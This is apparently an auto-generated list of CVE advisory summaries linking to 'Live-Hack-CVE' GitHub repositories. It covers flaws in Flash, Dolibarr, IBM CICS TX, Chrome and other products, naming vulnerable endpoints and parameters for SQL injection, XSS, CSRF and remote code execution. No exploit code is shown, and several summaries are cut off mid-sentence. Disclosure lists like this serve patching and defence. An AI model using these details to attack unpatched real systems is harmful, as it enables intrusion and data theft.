**Adobe Flash Player versions 24.0.0.194 and earlier have an exploitable use after free vulnerability related to event handlers. Successful exploitation could lead to arbitrary code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-2993](https://github.com/Live-Hack-CVE/CVE-2017-2993) create time: 2022-12-28T07:26:48Z

**Adobe Flash Player versions 24.0.0.194 and earlier have an exploitable use after free vulnerability in Primetime SDK event dispatch. Successful exploitation could lead to arbitrary code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-2994](https://github.com/Live-Hack-CVE/CVE-2017-2994) create time: 2022-12-28T07:26:45Z

**Adobe Flash Player versions 24.0.0.194 and earlier have an exploitable memory corruption vulnerability in Primetime SDK. Successful exploitation could lead to arbitrary code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-2996](https://github.com/Live-Hack-CVE/CVE-2017-2996) create time: 2022-12-28T07:26:38Z

**Adobe Flash Player versions 24.0.0.194 and earlier have an exploitable use after free vulnerability in a routine related to player shutdown. Successful exploitation could lead to arbitrary code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-2982](https://github.com/Live-Hack-CVE/CVE-2017-2982) create time: 2022-12-28T07:26:35Z

**Adobe Flash Player versions 24.0.0.194 and earlier have an exploitable heap overflow vulnerability in the h264 decoder routine. Successful exploitation could lead to arbitrary code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-2984](https://github.com/Live-Hack-CVE/CVE-2017-2984) create time: 2022-12-28T07:26:31Z

**SQL injection vulnerability in product/card.php in Dolibarr ERP/CRM version 7.0.3 allows remote attackers to execute arbitrary SQL commands via the statut parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-13447](https://github.com/Live-Hack-CVE/CVE-2018-13447) create time: 2022-12-28T08:00:28Z

**SQL injection vulnerability in user/card.php in Dolibarr version 8.0.2 allows remote authenticated users to execute arbitrary SQL commands via the employee parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-19998](https://github.com/Live-Hack-CVE/CVE-2018-19998) create time: 2022-12-28T07:29:53Z

**A stored cross-site scripting (XSS) vulnerability in Dolibarr 8.0.2 allows remote authenticated users to inject arbitrary web script or HTML via the "address" (POST) or "town" (POST) parameter to user/card.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-19995](https://github.com/Live-Hack-CVE/CVE-2018-19995) create time: 2022-12-28T07:29:50Z

**An error-based SQL injection vulnerability in product/card.php in Dolibarr version 8.0.2 allows remote authenticated users to execute arbitrary SQL commands via the desiredstock parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-19994](https://github.com/Live-Hack-CVE/CVE-2018-19994) create time: 2022-12-28T07:29:21Z

**A reflected cross-site scripting (XSS) vulnerability in Dolibarr 8.0.2 allows remote attackers to inject arbitrary web script or HTML via the transphrase parameter to public/notice.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-19993](https://github.com/Live-Hack-CVE/CVE-2018-19993) create time: 2022-12-28T07:29:03Z

**A stored cross-site scripting (XSS) vulnerability in Dolibarr 8.0.2 allows remote authenticated users to inject arbitrary web script or HTML via the "address" (POST) or "town" (POST) parameter to adherents/type.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-19992](https://github.com/Live-Hack-CVE/CVE-2018-19992) create time: 2022-12-28T07:28:46Z

**Dolibarr 6.0.4 is affected by: Cross Site Scripting (XSS). The impact is: Cookie stealing. The component is: htdocs/product/stats/card.php. The attack vector is: Victim must click a specially crafted link sent by the attacker. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-1010016](https://github.com/Live-Hack-CVE/CVE-2019-1010016) create time: 2022-12-28T08:02:04Z

**Dolibarr 7.0.0 is affected by: Cross Site Request Forgery (CSRF). The impact is: allow malitious html to change user password, disable users and disable password encryptation. The component is: Function User password change, user disable and password encryptation. The attack vector is: admin access malitious urls. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-1010054](https://github.com/Live-Hack-CVE/CVE-2019-1010054) create time: 2022-12-28T08:01:33Z

**An issue was discovered in Dolibarr 11.0.0-alpha. A user can store an IFRAME element (containing a user/card.php CSRF request) in his Linked Files settings page. When visited by the admin, this could completely take over the admin account. (The protection mechanism for CSRF is to check the Referer header; however, beca CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-15062](https://github.com/Live-Hack-CVE/CVE-2019-15062) create time: 2022-12-28T08:00:52Z

**In htdocs/societe/card.php in Dolibarr 10.0.1, the value of the User-Agent HTTP header is copied into the HTML document as plain text between tags, leading to XSS. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-16197](https://github.com/Live-Hack-CVE/CVE-2019-16197) create time: 2022-12-28T08:00:35Z

**Dolibarr 9.0.5 has stored XSS in a User Profile in a Signature section to card.php. A user with the "Create/modify other users, groups and permissions" privilege can inject script and can also achieve privilege escalation. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-16687](https://github.com/Live-Hack-CVE/CVE-2019-16687) create time: 2022-12-28T08:00:12Z

**Dolibarr 9.0.5 has stored XSS in a User Note section to note.php. A user with no privileges can inject script to attack the admin. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-16686](https://github.com/Live-Hack-CVE/CVE-2019-16686) create time: 2022-12-28T07:30:07Z

**Dolibarr 9.0.5 has stored XSS vulnerability via a User Group Description section to card.php. A user with the "Create/modify other users, groups and permissions" privilege can inject script and can also achieve privilege escalation. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-16685](https://github.com/Live-Hack-CVE/CVE-2019-16685) create time: 2022-12-28T07:30:00Z

**Dolibarr 9.0.5 has stored XSS in an Email Template section to mails_templates.php. A user with no privileges can inject script to attack the admin. (This stored XSS can affect all types of user privilege from Admin to users with no permissions.) CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-16688](https://github.com/Live-Hack-CVE/CVE-2019-16688) create time: 2022-12-28T07:29:56Z

**An issue was discovered in Dolibarr 10.0.2. It has XSS via the "outgoing email setup" feature in the admin/mails.php?action=edit URI via the "Sender email for automatic emails (default value in php.ini: Undefined)" field. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-17578](https://github.com/Live-Hack-CVE/CVE-2019-17578) create time: 2022-12-28T07:29:00Z

**An issue was discovered in Dolibarr 10.0.2. It has XSS via the "outgoing email setup" feature in the /admin/mails.php?action=edit URI via the "Send all emails to (instead of real recipients, for test purposes)" field. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-17576](https://github.com/Live-Hack-CVE/CVE-2019-17576) create time: 2022-12-28T07:28:53Z

**Dolibarr CRM/ERP 10.0.3 allows viewimage.php?file= Stored XSS due to JavaScript execution in an SVG image for a profile picture. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-19206](https://github.com/Live-Hack-CVE/CVE-2019-19206) create time: 2022-12-28T07:28:50Z

**An issue was discovered in Dolibarr 10.0.2. It has XSS via the "outgoing email setup" feature in the admin/mails.php?action=edit URI via the "Email used for error returns emails (fields 'Errors-To' in emails sent)" field. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-17577](https://github.com/Live-Hack-CVE/CVE-2019-17577) create time: 2022-12-28T07:28:43Z

**There is HTML Injection in the Note field in Dolibarr ERP/CRM 10.0.2 via user/note.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-17223](https://github.com/Live-Hack-CVE/CVE-2019-17223) create time: 2022-12-28T07:28:36Z

**A Stored Cross Site Scripting (XSS) issue in ZoneMinder 1.36.12 allows an attacker to execute HTML or JavaScript code via the Username field when an Admin (or non-Admin users that can see other users logged into the platform) clicks on Logout. NOTE: this exists in later versions than CVE-2019-7348 and requires a differ CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-30768](https://github.com/Live-Hack-CVE/CVE-2022-30768) create time: 2022-12-28T07:21:14Z

**In s::can moni::tools in versions below 4.2 an unauthenticated attacker could get any file from the device by path traversal in the image-relocator module. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-12508](https://github.com/Live-Hack-CVE/CVE-2020-12508) create time: 2022-12-28T08:06:27Z

**In s::can moni::tools before version 4.2 an authenticated attacker could get full access to the database through SQL injection. This may result in loss of confidentiality, loss of integrity and DoS. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-12507](https://github.com/Live-Hack-CVE/CVE-2020-12507) create time: 2022-12-28T08:06:12Z

**In Dolibarr 10.0.6, forms are protected with a CSRF token against CSRF attacks. The problem is any CSRF token in any user's session can be used in another user's session. CSRF tokens should not be valid in this situation. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-11825](https://github.com/Live-Hack-CVE/CVE-2020-11825) create time: 2022-12-28T08:01:10Z

**In Dolibarr 10.0.6, if USER_LOGIN_FAILED is active, there is a stored XSS vulnerability on the admin tools --> audit page. This may lead to stealing of the admin account. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-11823](https://github.com/Live-Hack-CVE/CVE-2020-11823) create time: 2022-12-28T08:00:59Z

**Dolibarr 11.0.4 is affected by multiple stored Cross-Site Scripting (XSS) vulnerabilities that could allow remote authenticated attackers to inject arbitrary web script or HTML via ticket/card.php?action=create with the subject, message, or address parameter; adherents/card.php with the societe or address parameter; pr CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-13828](https://github.com/Live-Hack-CVE/CVE-2020-13828) create time: 2022-12-28T08:00:39Z

**The DMS/ECM module in Dolibarr 11.0.4 renders user-uploaded .html files in the browser when the attachment parameter is removed from the direct download link. This causes XSS. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-13239](https://github.com/Live-Hack-CVE/CVE-2020-13239) create time: 2022-12-28T08:00:31Z

**The DMS/ECM module in Dolibarr 11.0.4 allows users with the 'Setup documents directories' permission to rename uploaded files to have insecure file extensions. This bypasses the .noexe protection mechanism against XSS. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-13240](https://github.com/Live-Hack-CVE/CVE-2020-13240) create time: 2022-12-28T08:00:15Z

**htdocs/user/passwordforgotten.php in Dolibarr 10.0.6 allows XSS via the Referer HTTP header. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-7996](https://github.com/Live-Hack-CVE/CVE-2020-7996) create time: 2022-12-28T07:29:24Z

**Dolibarr 11.0 allows XSS via the joinfiles, topic, or code parameter, or the HTTP Referer header. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-9016](https://github.com/Live-Hack-CVE/CVE-2020-9016) create time: 2022-12-28T07:29:14Z

**The htdocs/index.php?mainmenu=home login page in Dolibarr 10.0.6 allows an unlimited rate of failed authentication attempts. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-7995](https://github.com/Live-Hack-CVE/CVE-2020-7995) create time: 2022-12-28T07:29:10Z

**Multiple cross-site scripting (XSS) vulnerabilities in Dolibarr 10.0.6 allow remote attackers to inject arbitrary web script or HTML via the (1) label[libelle] parameter to the /htdocs/admin/dict.php?id=3 page; the (2) name[constname] parameter to the /htdocs/admin/const.php?mainmenu=home page; the (3) note[note] param CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-7994](https://github.com/Live-Hack-CVE/CVE-2020-7994) create time: 2022-12-28T07:28:32Z

**Dolibarr 12.0.3 is vulnerable to authenticated Remote Code Execution. An attacker who has the access the admin dashboard can manipulate the backup function by inserting a payload into the filename for the zipfilename_template parameter to admin/tools/dolibarr_export.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-35136](https://github.com/Live-Hack-CVE/CVE-2020-35136) create time: 2022-12-28T07:28:29Z

**OP5 Monitor 8.3.1, 8.3.2, and OP5 8.3.3 are vulnerable to Cross Site Scripting (XSS). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-40272](https://github.com/Live-Hack-CVE/CVE-2021-40272) create time: 2022-12-28T08:10:52Z

**Improper access control in BIOS firmware for some Intel(R) NUCs before version INWHL357.0046 may allow a privileged user to potentially enable escalation of privilege via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33164](https://github.com/Live-Hack-CVE/CVE-2021-33164) create time: 2022-12-28T08:05:45Z

**Improper input validation in the Intel(R) Distribution of OpenVINO(TM) Toolkit may allow an authenticated user to potentially enable denial of service via network access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-26251](https://github.com/Live-Hack-CVE/CVE-2021-26251) create time: 2022-12-28T08:02:51Z

**In “Dolibarr” application, v3.3.beta1_20121221 to v13.0.2 have “Modify” access for admin level users to change other user’s details but fails to validate already existing “Login” name, while renaming the user “Login”. This leads to complete account takeover of the victim user. This happens since the password gets overw CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-25956](https://github.com/Live-Hack-CVE/CVE-2021-25956) create time: 2022-12-28T07:28:26Z

**The website builder module in Dolibarr 13.0.2 allows remote PHP code execution because of an incomplete protection mechanism in which system, exec, and shell_exec are blocked but backticks are not blocked. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33816](https://github.com/Live-Hack-CVE/CVE-2021-33816) create time: 2022-12-28T07:28:23Z

**Dolibarr ERP and CRM 13.0.2 allows XSS via object details, as demonstrated by > and < characters in the onpointermove attribute of a BODY element to the user-management feature. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33618](https://github.com/Live-Hack-CVE/CVE-2021-33618) create time: 2022-12-28T07:28:19Z

**phpseclib before 2.0.31 and 3.x before 3.0.7 mishandles RSA PKCS#1 v1.5 signature verification. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-30130](https://github.com/Live-Hack-CVE/CVE-2021-30130) create time: 2022-12-28T07:25:57Z

**Improper authentication in subsystem for Intel(R) AMT before versions 11.8.93, 11.22.93, 11.12.93, 12.0.92, 14.1.67, 15.0.42, 16.1.25 may allow a privileged user to potentially enable escalation of privilege via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33159](https://github.com/Live-Hack-CVE/CVE-2021-33159) create time: 2022-12-28T07:24:41Z

**A SQL injection vulnerability exits on the Simple Image Gallery System 1.0 application through "id" parameter on the album page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-38819](https://github.com/Live-Hack-CVE/CVE-2021-38819) create time: 2022-12-28T07:22:03Z

**Heap-based buffer overflow vulnerability in Mitsubishi Electric FA Engineering Software (CPU Module Logging Configuration Tool versions 1.112R and prior, CW Configurator versions 1.011M and prior, Data Transfer versions 3.44W and prior, EZSocket versions 5.4 and prior, FR Configurator all versions, FR Configurator SW3 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-20587](https://github.com/Live-Hack-CVE/CVE-2021-20587) create time: 2022-12-28T07:19:28Z

**Schroot before 1.6.13 had too permissive rules on chroot or session names, allowing a denial of service on the schroot service for all users that may start a schroot session. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2787](https://github.com/Live-Hack-CVE/CVE-2022-2787) create time: 2022-12-28T08:11:48Z

**IBM CICS TX 11.1 Standard and Advanced could allow a remote attacker to bypass security restrictions, caused by a reverse tabnabbing flaw. An attacker could exploit this vulnerability and redirect a victim to a phishing site. IBM X-Force ID: 234172. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38705](https://github.com/Live-Hack-CVE/CVE-2022-38705) create time: 2022-12-28T08:11:45Z

**The underlying bug might cause read past end of the buffer and either read memory it should not read, or crash the process. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2881](https://github.com/Live-Hack-CVE/CVE-2022-2881) create time: 2022-12-28T08:11:41Z

**IBM CICS TX 11.1 could disclose sensitive information to a local user due to insecure permission settings. IBM X-Force ID: 229450. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34314](https://github.com/Live-Hack-CVE/CVE-2022-34314) create time: 2022-12-28T08:11:37Z

**IBM CICS TX 11.1 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 229451. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34315](https://github.com/Live-Hack-CVE/CVE-2022-34315) create time: 2022-12-28T08:11:21Z

**IBM CICS TX 11.1 allows web pages to be stored locally which can be read by another user on the system. IBM X-Force ID: 229447. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34312](https://github.com/Live-Hack-CVE/CVE-2022-34312) create time: 2022-12-28T08:11:18Z

**IBM CICS TX 11.7 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 229463. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34319](https://github.com/Live-Hack-CVE/CVE-2022-34319) create time: 2022-12-28T08:11:14Z

**IBM CICS TX 11.7 could allow an attacker to obtain sensitive information from HTTP response headers. IBM X-Force ID: 229467. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34329](https://github.com/Live-Hack-CVE/CVE-2022-34329) create time: 2022-12-28T08:11:11Z

**IBM CICS TX 11.1 does not set the secure attribute on authorization tokens or session cookies. Attackers may be able to get the cookie values by sending a http:// link to a user or by planting this link in a site the user goes to. The cookie will be sent to the insecure link and the attacker can then obtain the cookie CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-34313](https://github.com/Live-Hack-CVE/CVE-2022-34313) create time: 2022-12-28T08:11:07Z

**The OAuth Client by DigitialPixies WordPress plugin through 1.1.0 does not have CSRF checks in some places, which could allow attackers to make logged-in users perform unwanted actions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3632](https://github.com/Live-Hack-CVE/CVE-2022-3632) create time: 2022-12-28T08:11:04Z

**Rukovoditel v3.2.1 was discovered to contain a SQL injection vulnerability via the order_by parameter at /rukovoditel/index.php?module=logs/view&type=php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43288](https://github.com/Live-Hack-CVE/CVE-2022-43288) create time: 2022-12-28T08:11:00Z

**A stored cross-site scripting (XSS) vulnerability in the Add function of Eramba GRC Software c2.8.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the KPI Title text field. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43342](https://github.com/Live-Hack-CVE/CVE-2022-43342) create time: 2022-12-28T08:10:57Z

**IBM MQ Internet Pass-Thru 2.1, 9.2 LTS and 9.2 CD stores potentially sensitive information in trace files that could be read by a local user. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35719](https://github.com/Live-Hack-CVE/CVE-2022-35719) create time: 2022-12-28T08:10:48Z

**EyouCMS V1.5.9-UTF8-SP1 was discovered to contain a Cross-Site Request Forgery (CSRF) via the Edit Admin Profile module. This vulnerability allows attackers to arbitrarily change Administrator account information. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44389](https://github.com/Live-Hack-CVE/CVE-2022-44389) create time: 2022-12-28T08:08:19Z

**EyouCMS V1.5.9-UTF8-SP1 was discovered to contain a Cross-Site Request Forgery (CSRF) via the Basic Information component under the Edit Member module. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-44387](https://github.com/Live-Hack-CVE/CVE-2022-44387) create time: 2022-12-28T08:08:16Z

**EyouCMS V1.5.9-UTF8-SP1 was discovered to contain a Cross-Site Request Forgery (CSRF) via the Top Up Balance component under the Edit Member module. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43323](https://github.com/Live-Hack-CVE/CVE-2022-43323) create time: 2022-12-28T08:08:12Z

**Concrete CMS (formerly concrete5) below 8.5.10 and between 9.0.0 and 9.1.2 is vulnerable to Reflected XSS in the image manipulation library due to un-sanitized output. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43694](https://github.com/Live-Hack-CVE/CVE-2022-43694) create time: 2022-12-28T08:08:09Z

**Zoho ManageEngine Password Manager Pro before 12122, PAM360 before 5711, and Access Manager Plus before 4306 allow SQL Injection (in a different software component relative to CVE-2022-43671. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43672](https://github.com/Live-Hack-CVE/CVE-2022-43672) create time: 2022-12-28T08:08:05Z

**Concrete CMS (formerly concrete5) below 8.5.10 and between 9.0.0 and 9.1.2 is vulnerable to Reflected XSS - user can cause an administrator to trigger reflected XSS with a url if the targeted administrator is using an old browser that lacks XSS protection. Remediate by updating to Concrete CMS 9.1.3+ or 8.5.10+. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43692](https://github.com/Live-Hack-CVE/CVE-2022-43692) create time: 2022-12-28T08:08:02Z

**** UNSUPPORTED WHEN ASSIGNED ** A remote insecure deserialization vulnerability exixsts in VMWare Hyperic Agent 5.8.6. Exploitation of this vulnerability enables a malicious authenticated user to run arbitrary code or malware within a Hyperic Agent instance and its host operating system with the privileges of the Hyper CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38652](https://github.com/Live-Hack-CVE/CVE-2022-38652) create time: 2022-12-28T08:07:59Z

**** UNSUPPORTED WHEN ASSIGNED ** A security filter misconfiguration exists in VMware Hyperic Server 5.8.6. Exploitation of this vulnerability enables a malicious party to bypass some authentication requirements when issuing requests to Hyperic Server. NOTE: This vulnerability only affects products that are no longer sup CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38651](https://github.com/Live-Hack-CVE/CVE-2022-38651) create time: 2022-12-28T08:07:55Z

**** UNSUPPORTED WHEN ASSIGNED ** A remote unauthenticated insecure deserialization vulnerability exists in VMware Hyperic Server 5.8.6. Exploitation of this vulnerability enables a malicious party to run arbitrary code or malware within Hyperic Server and the host operating system with the privileges of the Hyperic serv CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38650](https://github.com/Live-Hack-CVE/CVE-2022-38650) create time: 2022-12-28T08:07:51Z

**Insufficient validation in the IOCTL input/output buffer in AMD ?Prof may allow an attacker to bypass bounds checks potentially leading to a Windows kernel crash resulting in denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-27674](https://github.com/Live-Hack-CVE/CVE-2022-27674) create time: 2022-12-28T08:07:48Z

**Insufficient access controls in the AMD Link Android app may potentially result in information disclosure. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-27673](https://github.com/Live-Hack-CVE/CVE-2022-27673) create time: 2022-12-28T08:07:44Z

**Insufficient validation of the IOCTL input buffer in AMD ?Prof may allow an attacker to send an arbitrary buffer leading to a potential Windows kernel crash resulting in denial of service. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23831](https://github.com/Live-Hack-CVE/CVE-2022-23831) create time: 2022-12-28T08:07:41Z

**Flooding SNS firewall versions 3.7.0 to 3.7.29, 3.11.0 to 3.11.17, 4.2.0 to 4.2.10, and 4.3.0 to 4.3.6 with specific forged traffic, can lead to SNS DoS. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-27812](https://github.com/Live-Hack-CVE/CVE-2022-27812) create time: 2022-12-28T08:07:37Z

**WoWonder Social Network Platform 4.1.4 was discovered to contain a SQL injection vulnerability via the offset parameter at requests.php?f=search&s=recipients. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42984](https://github.com/Live-Hack-CVE/CVE-2022-42984) create time: 2022-12-28T08:07:34Z

**The Netic User Export add-on before 1.3.5 for Atlassian Confluence has the functionality to generate a list of users in the application, and export it. During export, the HTTP request has a fileName parameter that accepts any file on the system (e.g., an SSH private key) to be downloaded. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42977](https://github.com/Live-Hack-CVE/CVE-2022-42977) create time: 2022-12-28T08:07:30Z

**WoWonder Social Network Platform v4.1.2 was discovered to contain a SQL injection vulnerability via the offset parameter at requests.php?f=load-my-blogs. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40405](https://github.com/Live-Hack-CVE/CVE-2022-40405) create time: 2022-12-28T08:07:27Z

**Users with write permissions to a repository can delete arbitrary directories. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40309](https://github.com/Live-Hack-CVE/CVE-2022-40309) create time: 2022-12-28T08:07:23Z

**Skia, as used in Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, allows remote attackers to cause a denial of service (out-of-bounds read) via vectors related to a "user gesture check for dangerous file downloads." CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-0888](https://github.com/Live-Hack-CVE/CVE-2013-0888) create time: 2022-12-28T06:44:08Z

**Multiple unspecified vulnerabilities in the IPC layer in Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, allow remote attackers to cause a denial of service (memory corruption) or possibly have other impact via unknown vectors. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-0890](https://github.com/Live-Hack-CVE/CVE-2013-0890) create time: 2022-12-28T06:44:04Z

**Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, does not properly enforce a user gesture requirement before proceeding with a file download, which might make it easier for remote attackers to execute arbitrary code via a crafted file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-0889](https://github.com/Live-Hack-CVE/CVE-2013-0889) create time: 2022-12-28T06:43:59Z

**Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, allows remote attackers to cause a denial of service (incorrect read operation) via crafted data in the Matroska container format. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-0881](https://github.com/Live-Hack-CVE/CVE-2013-0881) create time: 2022-12-28T06:43:51Z

**Skia, as used in Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, allows remote attackers to cause a denial of service (incorrect read operation) via unspecified vectors. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-0883](https://github.com/Live-Hack-CVE/CVE-2013-0883) create time: 2022-12-28T06:43:46Z

**Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, allows remote attackers to cause a denial of service (incorrect memory access) or possibly have unspecified other impact via a large number of SVG parameters. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-0882](https://github.com/Live-Hack-CVE/CVE-2013-0882) create time: 2022-12-28T06:43:43Z

**The developer-tools process in Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, does not properly restrict privileges during interaction with a connected server, which has unspecified impact and attack vectors. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-0887](https://github.com/Live-Hack-CVE/CVE-2013-0887) create time: 2022-12-28T06:39:36Z

**Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, does not properly load Native Client (aka NaCl) code, which has unspecified impact and attack vectors. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-0884](https://github.com/Live-Hack-CVE/CVE-2013-0884) create time: 2022-12-28T06:39:02Z

**Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, does not properly restrict API privileges during interaction with the Chrome Web Store, which has unspecified impact and attack vectors. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-0885](https://github.com/Live-Hack-CVE/CVE-2013-0885) create time: 2022-12-28T06:38:58Z

**Integer overflow in Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, allows remote attackers to cause a denial of service or possibly have unspecified other impact via a blob. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-0891](https://github.com/Live-Hack-CVE/CVE-2013-0891) create time: 2022-12-28T06:38:54Z

**Multiple unspecified vulnerabilities in the IPC layer in Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, allow remote attackers to cause a denial of service or possibly have other impact via unknown vectors. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-0892](https://github.com/Live-Hack-CVE/CVE-2013-0892) create time: 2022-12-28T06:38:50Z

**Race condition in Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to media. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-0893](https://github.com/Live-Hack-CVE/CVE-2013-0893) create time: 2022-12-28T06:38:47Z

**Google Chrome before 25.0.1364.97 on Linux, and before 25.0.1364.99 on Mac OS X, does not properly handle pathnames during copy operations, which might make it easier for remote attackers to execute arbitrary programs via unspecified vectors. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-0895](https://github.com/Live-Hack-CVE/CVE-2013-0895) create time: 2022-12-28T06:38:43Z

**Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, does not properly manage memory during message handling for plug-ins, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-0896](https://github.com/Live-Hack-CVE/CVE-2013-0896) create time: 2022-12-28T06:38:39Z

**Off-by-one error in the PDF functionality in Google Chrome before 25.0.1364.97 on Windows and Linux, and before 25.0.1364.99 on Mac OS X, allows remote attackers to cause a denial of service via a crafted document. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-0897](https://github.com/Live-Hack-CVE/CVE-2013-0897) create time: 2022-12-28T06:38:36Z

